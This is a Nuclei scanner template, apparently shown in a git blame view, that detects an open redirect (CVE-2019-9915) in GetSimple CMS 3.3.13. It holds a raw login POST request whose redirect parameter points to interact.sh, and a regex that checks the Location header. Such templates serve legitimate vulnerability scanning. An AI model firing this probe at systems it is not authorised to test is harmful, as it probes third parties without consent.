nuclei-templates/http/cves/2019/CVE-2019-9915.yaml

42 lines
1.6 KiB
YAML
Raw Normal View History

2022-03-13 08:58:20 +00:00
id: CVE-2019-9915
info:
name: GetSimple CMS 3.3.13 - Open Redirect
2022-03-13 08:58:20 +00:00
author: 0x_Akoko
severity: medium
description: GetSimple CMS 3.3.13 contains an open redirect vulnerability via the admin/index.php redirect parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
2022-03-13 08:58:20 +00:00
reference:
- https://www.invicti.com/web-applications-advisories/ns-18-056-open-redirection-vulnerability-in-getsimplecms
- https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1300
- https://www.netsparker.com/web-applications-advisories/ns-18-056-open-redirection-vulnerability-in-getsimplecms/
- https://nvd.nist.gov/vuln/detail/CVE-2019-9915
2022-03-13 08:58:20 +00:00
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
2022-03-13 08:58:20 +00:00
cve-id: CVE-2019-9915
cwe-id: CWE-601
2023-08-31 11:46:18 +00:00
epss-score: 0.0016
2023-07-15 16:29:17 +00:00
cpe: cpe:2.3:a:get-simple.:getsimplecms:3.3.13:*:*:*:*:*:*:*
2023-08-31 11:46:18 +00:00
epss-percentile: 0.52017
2022-07-29 19:15:59 +00:00
metadata:
max-request: 1
2023-06-04 08:13:42 +00:00
verified: true
2023-07-15 16:29:17 +00:00
vendor: get-simple.
product: getsimplecms
2022-07-29 19:15:59 +00:00
tags: cve,cve2019,redirect,getsimple,cms
2022-03-13 08:58:20 +00:00
http:
2022-07-29 19:15:59 +00:00
- raw:
- |
POST /admin/index.php?redirect=https://interact.sh/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
userid={{username}}&pwd={{password}}&submitted=Login
2022-03-13 08:58:20 +00:00
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/' # https://regex101.com/r/ZDYhFh/1